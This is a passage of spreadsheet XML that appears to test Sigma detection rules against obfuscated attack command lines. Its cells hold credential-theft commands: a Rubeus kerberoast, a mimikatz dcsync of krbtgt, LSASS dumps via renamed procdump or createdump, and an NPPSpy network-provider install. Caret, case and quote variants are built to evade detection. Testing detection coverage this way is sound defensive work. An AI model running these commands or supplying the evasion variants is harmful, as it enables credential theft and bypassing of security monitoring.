      <c r="B6" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C6" s="44" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D6" s="44" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E6" s="44" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -EnCOdinG Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F6" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G6" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H6" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I6" s="43" t="n"/>
      <c r="J6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K6" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="7" ht="22.5" customHeight="1" s="42">
      <c r="A7" s="43" t="n"/>
      <c r="B7" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C7" s="44" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D7" s="44" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E7" s="44" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -encoDINg Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F7" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G7" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H7" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I7" s="43" t="n"/>
      <c r="J7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K7" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="8" ht="22.5" customHeight="1" s="42">
      <c r="A8" s="43" t="n"/>
      <c r="B8" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_connection_strings_decryption</t>
        </is>
      </c>
      <c r="C8" s="44" t="inlineStr">
        <is>
          <t>Microsoft IIS Connection Strings Decryption</t>
        </is>
      </c>
      <c r="D8" s="44" t="inlineStr">
        <is>
          <t>97dbf6e2-e436-44d8-abee-4261b24d3e41</t>
        </is>
      </c>
      <c r="E8" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -exec bypass -"c" "&amp; { [System.Reflection.Assembly]::LoadFrom('C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe'); [YourNamespace.YourClass]::DecryptConnectionStrings('connectionStrings', 'C:\inetpub\wwwroot') }"</t>
        </is>
      </c>
      <c r="F8" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G8" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H8" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I8" s="43" t="n"/>
      <c r="J8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K8" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="9" ht="22.5" customHeight="1" s="42">
      <c r="A9" s="43" t="n"/>
      <c r="B9" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_connection_strings_decryption</t>
        </is>
      </c>
      <c r="C9" s="44" t="inlineStr">
        <is>
          <t>Microsoft IIS Connection Strings Decryption</t>
        </is>
      </c>
      <c r="D9" s="44" t="inlineStr">
        <is>
          <t>97dbf6e2-e436-44d8-abee-4261b24d3e41</t>
        </is>
      </c>
      <c r="E9" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -exec bypass /"c" "&amp; { [System.Reflection.Assembly]::LoadFrom('C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe'); [YourNamespace.YourClass]::DecryptConnectionStrings('connectionStrings', 'C:\inetpub\wwwroot') }"</t>
        </is>
      </c>
      <c r="F9" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G9" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H9" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I9" s="43" t="n"/>
      <c r="J9" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K9" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="10" ht="22.5" customHeight="1" s="42">
      <c r="A10" s="43" t="n"/>
      <c r="B10" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_connection_strings_decryption</t>
        </is>
      </c>
      <c r="C10" s="44" t="inlineStr">
        <is>
          <t>Microsoft IIS Connection Strings Decryption</t>
        </is>
      </c>
      <c r="D10" s="44" t="inlineStr">
        <is>
          <t>97dbf6e2-e436-44d8-abee-4261b24d3e41</t>
        </is>
      </c>
      <c r="E10" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile /"exec" bypass -C "&amp; { [System.Reflection.Assembly]::LoadFrom('C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe'); [YourNamespace.YourClass]::DecryptConnectionStrings('connectionStrings', 'C:\inetpub\wwwroot') }"</t>
        </is>
      </c>
      <c r="F10" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G10" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H10" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I10" s="43" t="n"/>
      <c r="J10" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K10" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="11" ht="22.5" customHeight="1" s="42">
      <c r="A11" s="43" t="n"/>
      <c r="B11" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_connection_strings_decryption</t>
        </is>
      </c>
      <c r="C11" s="44" t="inlineStr">
        <is>
          <t>Microsoft IIS Connection Strings Decryption</t>
        </is>
      </c>
      <c r="D11" s="44" t="inlineStr">
        <is>
          <t>97dbf6e2-e436-44d8-abee-4261b24d3e41</t>
        </is>
      </c>
      <c r="E11" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"nop" /"exec" bypass -C "&amp; { [System.Reflection.Assembly]::LoadFrom('C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe'); [YourNamespace.YourClass]::DecryptConnectionStrings('connectionStrings', 'C:\inetpub\wwwroot') }"</t>
        </is>
      </c>
      <c r="F11" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G11" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H11" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I11" s="43" t="n"/>
      <c r="J11" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K11" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="12" ht="22.5" customHeight="1" s="42">
      <c r="A12" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B12" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_new_network_provider</t>
        </is>
      </c>
      <c r="C12" s="44" t="inlineStr">
        <is>
          <t>Potential Credential Dumping Attempt Using New NetworkProvider - CLI</t>
        </is>
      </c>
      <c r="D12" s="44" t="inlineStr">
        <is>
          <t>baef1ec6-2ca9-47a3-97cc-4cf2bda10b77</t>
        </is>
      </c>
      <c r="E12" s="44" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {Copy-Item \"C:\AtomicRedTeam\atomics\..\ExternalPayloads\NPPSPY.dll\" -Destination \"C:\Windows\System32\" 
$path = Get-ItemProperty -Path \"HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order\" -Name PROVIDERORDER 
$UpdatedValue = $Path.PROVIDERORDER + \",NPPSpy\" 
Set-ItemProperty -Path $Path.PSPath -Name \"PROVIDERORDER\" -Value $UpdatedValue 
$rv = New-Item -Path \"HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\" -ErrorAction Ignore 
$rv = New-Item -Path ('HKLM:\SYSTEM\CurrentControlSet\' + 'Services\NPPSpy\NetworkProvider') -ErrorAction Ignore 
$rv = New-ItemProperty -Path ('HKLM:\SYSTEM\CurrentControlSet\' + 'Services\NPPSpy\NetworkProvider') -Name \"Class\" -Value 2 -ErrorAction Ignore 
$rv = New-ItemProperty -Path ('HKLM:\SYSTEM\CurrentControlSet\' + 'Services\NPPSpy\NetworkProvider') -Name \"Name\" -Value NPPSpy -ErrorAction Ignore 
$rv = New-ItemProperty -Path ('HKLM:\SYSTEM\CurrentControlSet\' + 'Services\NPPSpy\NetworkProvider') -Name \"ProviderPath\" -PropertyType ExpandString -Value \"%%SystemRoot%%\System32\NPPSPY.dll\" -ErrorAction Ignore 
echo \"[!] Please, logout and log back in.\"}</t>
        </is>
      </c>
      <c r="F12" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G12" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H12" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I12" s="43" t="n"/>
      <c r="J12" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K12" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="22.5" customHeight="1" s="42">
      <c r="A13" s="43" t="n"/>
      <c r="B13" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_shadow_copies_creation</t>
        </is>
      </c>
      <c r="C13" s="44" t="inlineStr">
        <is>
          <t>Shadow Copies Creation Using Operating Systems Utilities</t>
        </is>
      </c>
      <c r="D13" s="44" t="inlineStr">
        <is>
          <t>b17ea6f7-6e90-447e-a799-e6c0a493d6ce</t>
        </is>
      </c>
      <c r="E13" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-WmiMethod -Class ('Win32_Shad' + 'owCopy') -Name ('Cre' + 'ate') -ArgumentList 'C:\'"</t>
        </is>
      </c>
      <c r="F13" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G13" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H13" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I13" s="43" t="n"/>
      <c r="J13" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K13" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="14" ht="22.5" customHeight="1" s="42">
      <c r="A14" s="43" t="n"/>
      <c r="B14" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_shadow_copies_creation</t>
        </is>
      </c>
      <c r="C14" s="44" t="inlineStr">
        <is>
          <t>Shadow Copies Creation Using Operating Systems Utilities</t>
        </is>
      </c>
      <c r="D14" s="44" t="inlineStr">
        <is>
          <t>b17ea6f7-6e90-447e-a799-e6c0a493d6ce</t>
        </is>
      </c>
      <c r="E14" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WmiMethod -Class ('Win32_Shad' + 'owCopy') -Name ('Cre' + 'ate') -ArgumentList 'C:\'"</t>
        </is>
      </c>
      <c r="F14" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G14" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H14" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I14" s="43" t="n"/>
      <c r="J14" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K14" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="15" ht="22.5" customHeight="1" s="42">
      <c r="A15" s="43" t="n"/>
      <c r="B15" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_tasklist_module_enumeration</t>
        </is>
      </c>
      <c r="C15" s="44" t="inlineStr">
        <is>
          <t>Loaded Module Enumeration Via Tasklist.EXE</t>
        </is>
      </c>
      <c r="D15" s="44" t="inlineStr">
        <is>
          <t>34275eb8-fa19-436b-b959-3d9ecd53fa1f</t>
        </is>
      </c>
      <c r="E15" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-Process | Where-Object { $_.Modules.ModuleName -contains 'rdpcorets.dll' }"</t>
        </is>
      </c>
      <c r="F15" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G15" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H15" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I15" s="43" t="n"/>
      <c r="J15" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K15" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="16" ht="22.5" customHeight="1" s="42">
      <c r="A16" s="44" t="n"/>
      <c r="B16" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_tasklist_module_enumeration</t>
        </is>
      </c>
      <c r="C16" s="44" t="inlineStr">
        <is>
          <t>Loaded Module Enumeration Via Tasklist.EXE</t>
        </is>
      </c>
      <c r="D16" s="44" t="inlineStr">
        <is>
          <t>34275eb8-fa19-436b-b959-3d9ecd53fa1f</t>
        </is>
      </c>
      <c r="E16" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-Process | Where-Object { $_.Modules.ModuleName -contains 'rdpcorets.dll' }"</t>
        </is>
      </c>
      <c r="F16" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G16" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H16" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I16" s="43" t="n"/>
      <c r="J16" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K16" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="17" ht="22.5" customHeight="1" s="42">
      <c r="A17" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B17" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C17" s="44" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D17" s="44" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E17" s="44" t="inlineStr">
        <is>
          <t>"C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.17\createdump.exe" "-u" "-f" C:\Users\Public\dotnet-lsass.dmp 788</t>
        </is>
      </c>
      <c r="F17" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G17" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H17" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I17" s="44" t="n"/>
      <c r="J17" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K17" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="22.5" customHeight="1" s="42">
      <c r="A18" s="43" t="n"/>
      <c r="B18" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dump64_defender_av_bypass_rename</t>
        </is>
      </c>
      <c r="C18" s="44" t="inlineStr">
        <is>
          <t>Potential Windows Defender AV Bypass Via Dump64.EXE Rename</t>
        </is>
      </c>
      <c r="D18" s="44" t="inlineStr">
        <is>
          <t>129966c9-de17-4334-a123-8b58172e664d</t>
        </is>
      </c>
      <c r="E18" s="44" t="inlineStr">
        <is>
          <t>copy procdump.exe "\\?\C:\Program Files\Microsoft Visual Studio\dump64.exe" &amp;&amp; "\\?\C:\Program Files\Microsoft Visual Studio\dump64.exe" -AcceptEula -ma lsass.exe lsass.dmp</t>
        </is>
      </c>
      <c r="F18" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G18" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H18" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I18" s="44" t="n"/>
      <c r="J18" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K18" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="19" ht="22.5" customHeight="1" s="42">
      <c r="A19" s="43" t="n"/>
      <c r="B19" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dump64_defender_av_bypass_rename</t>
        </is>
      </c>
      <c r="C19" s="44" t="inlineStr">
        <is>
          <t>Potential Windows Defender AV Bypass Via Dump64.EXE Rename</t>
        </is>
      </c>
      <c r="D19" s="44" t="inlineStr">
        <is>
          <t>129966c9-de17-4334-a123-8b58172e664d</t>
        </is>
      </c>
      <c r="E19" s="43" t="inlineStr">
        <is>
          <t>copy procdump.exe "\\?\C:\Program Files\Microsoft Visual Studio\dump64.exe" &amp;&amp; "\\?\C:\Program Files\Microsoft Visual Studio\dump64.exe" -aCcEpTeUlA -"ma" lsass.exe lsass.dmp</t>
        </is>
      </c>
      <c r="F19" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G19" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H19" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I19" s="43" t="n"/>
      <c r="J19" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K19" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="20" ht="22.5" customHeight="1" s="42">
      <c r="A20" s="43" t="n"/>
      <c r="B20" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dump64_defender_av_bypass_rename</t>
        </is>
      </c>
      <c r="C20" s="44" t="inlineStr">
        <is>
          <t>Potential Windows Defender AV Bypass Via Dump64.EXE Rename</t>
        </is>
      </c>
      <c r="D20" s="44" t="inlineStr">
        <is>
          <t>129966c9-de17-4334-a123-8b58172e664d</t>
        </is>
      </c>
      <c r="E20" s="44" t="inlineStr">
        <is>
          <t>copy procdump.exe "\\?\C:\Program Files\Microsoft Visual Studio\dump64.exe" &amp;&amp; "\\?\C:\Program Files\Microsoft Visual Studio\dump64.exe" -AccEpteula -ma lsass.exe lsass.dmp</t>
        </is>
      </c>
      <c r="F20" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G20" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H20" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I20" s="43" t="n"/>
      <c r="J20" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K20" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" s="42">
      <c r="A21" s="43" t="n"/>
      <c r="B21" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dump64_defender_av_bypass_rename</t>
        </is>
      </c>
      <c r="C21" s="44" t="inlineStr">
        <is>
          <t>Potential Windows Defender AV Bypass Via Dump64.EXE Rename</t>
        </is>
      </c>
      <c r="D21" s="44" t="inlineStr">
        <is>
          <t>129966c9-de17-4334-a123-8b58172e664d</t>
        </is>
      </c>
      <c r="E21" s="44" t="inlineStr">
        <is>
          <t>copy procdump.exe "\\?\C:\Program Files\Microsoft Visual Studio\dump64.exe" &amp;&amp; "\\?\C:\Program Files\Microsoft Visual Studio\dump64.exe" -AccEpteulA -MA lsass.exe lsass.dmp</t>
        </is>
      </c>
      <c r="F21" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G21" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H21" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I21" s="44" t="n"/>
      <c r="J21" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K21" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" s="42">
      <c r="A22" s="43" t="n"/>
      <c r="B22" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_patterns</t>
        </is>
      </c>
      <c r="C22" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Process Patterns</t>
        </is>
      </c>
      <c r="D22" s="44" t="inlineStr">
        <is>
          <t>f26307d8-14cd-47e3-a26b-4b4769f24af6</t>
        </is>
      </c>
      <c r="E22" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "tasklist,/v,/fo,csv | findstr /i lsass"</t>
        </is>
      </c>
      <c r="F22" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G22" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H22" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I22" s="43" t="n"/>
      <c r="J22" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K22" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" s="42">
      <c r="A23" s="43" t="n"/>
      <c r="B23" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_handlekatz</t>
        </is>
      </c>
      <c r="C23" s="44" t="inlineStr">
        <is>
          <t>HackTool - HandleKatz LSASS Dumper Execution</t>
        </is>
      </c>
      <c r="D23" s="44" t="inlineStr">
        <is>
          <t>ca621ba5-54ab-4035-9942-d378e6fcde3c</t>
        </is>
      </c>
      <c r="E23" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\temp\sys_tool.exe --p^id: 700 --outf^ile: C:\temp\output.bin"</t>
        </is>
      </c>
      <c r="F23" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G23" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H23" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I23" s="43" t="n"/>
      <c r="J23" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K23" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" s="42">
      <c r="A24" s="43" t="n"/>
      <c r="B24" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_inveigh</t>
        </is>
      </c>
      <c r="C24" s="44" t="inlineStr">
        <is>
          <t>HackTool - Inveigh Execution</t>
        </is>
      </c>
      <c r="D24" s="44" t="inlineStr">
        <is>
          <t>b99a1518-1ad5-4f65-bc95-1ffff97a8fd0</t>
        </is>
      </c>
      <c r="E24" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Temp\sys_update.exe -S^pooferIP 10.0.0.2 -S^nifferIP 10.0.0.2"</t>
        </is>
      </c>
      <c r="F24" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G24" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H24" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I24" s="43" t="n"/>
      <c r="J24" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K24" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" s="42">
      <c r="A25" s="43" t="inlineStr">
        <is>
          <t>t1003.001</t>
        </is>
      </c>
      <c r="B25" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_mimikatz_command_line</t>
        </is>
      </c>
      <c r="C25" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution</t>
        </is>
      </c>
      <c r="D25" s="44" t="inlineStr">
        <is>
          <t>a642964e-bead-4bed-8910-1bb4d63e3b4d</t>
        </is>
      </c>
      <c r="E25" s="44" t="inlineStr">
        <is>
          <t>mimikatz.exe "lsadump""::dcsync /domain:%userdnsdomain% /user:krbtgt@%userdnsdomain%" "exit"</t>
        </is>
      </c>
      <c r="F25" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G25" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H25" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I25" s="44" t="n"/>
      <c r="J25" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K25" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" s="42">
      <c r="A26" s="43" t="n"/>
      <c r="B26" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_xordump</t>
        </is>
      </c>
      <c r="C26" s="44" t="inlineStr">
        <is>
          <t>HackTool - XORDump Execution</t>
        </is>
      </c>
      <c r="D26" s="44" t="inlineStr">
        <is>
          <t>66e563f9-1cbd-4a22-a957-d8b7c0f44372</t>
        </is>
      </c>
      <c r="E26" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\temp\update_service.exe -p^rocess lsass.exe -m c^omsvcs"</t>
        </is>
      </c>
      <c r="F26" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G26" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H26" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I26" s="44" t="n"/>
      <c r="J26" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K26" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" s="42">
      <c r="A27" s="43" t="n"/>
      <c r="B27" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_susp_sqldumper_activity</t>
        </is>
      </c>
      <c r="C27" s="44" t="inlineStr">
        <is>
          <t>Dumping Process via Sqldumper.exe</t>
        </is>
      </c>
      <c r="D27" s="44" t="inlineStr">
        <is>
          <t>23ceaf5c-b6f1-4a32-8559-f2ff734be516</t>
        </is>
      </c>
      <c r="E27" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "sqldumper.exe 700 0 0^x0110"</t>
        </is>
      </c>
      <c r="F27" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G27" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H27" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I27" s="44" t="n"/>
      <c r="J27" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K27" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" s="42">
      <c r="A28" s="43" t="n"/>
      <c r="B28" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C28" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D28" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E28" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "malicious_dump.exe --full --name C:\temp\lsass.d^mp 756"</t>
        </is>
      </c>
      <c r="F28" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G28" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H28" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I28" s="43" t="n"/>
      <c r="J28" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K28" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" s="42">
      <c r="A29" s="43" t="n"/>
      <c r="B29" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C29" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D29" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E29" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F29" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G29" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H29" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I29" s="44" t="n"/>
      <c r="J29" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K29" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" s="42">
      <c r="A30" s="44" t="n"/>
      <c r="B30" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C30" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D30" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E30" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F30" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G30" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H30" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I30" s="43" t="n"/>
      <c r="J30" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K30" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" s="42">
      <c r="A31" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B31" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_shadow_copies_access_symlink</t>
        </is>
      </c>
      <c r="C31" s="44" t="inlineStr">
        <is>
          <t>VolumeShadowCopy Symlink Creation Via Mklink</t>
        </is>
      </c>
      <c r="D31" s="44" t="inlineStr">
        <is>
          <t>40b19fa6-d835-400c-b301-41f3a2baacaf</t>
        </is>
      </c>
      <c r="E31" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "m^kli^n^k /D C:\temp\vss \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1"</t>
        </is>
      </c>
      <c r="F31" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G31" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H31" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I31" s="44" t="n"/>
      <c r="J31" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K31" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="32" ht="15.75" customHeight="1" s="42">
      <c r="A32" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B32" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_shadow_copies_access_symlink</t>
        </is>
      </c>
      <c r="C32" s="44" t="inlineStr">
        <is>
          <t>VolumeShadowCopy Symlink Creation Via Mklink</t>
        </is>
      </c>
      <c r="D32" s="44" t="inlineStr">
        <is>
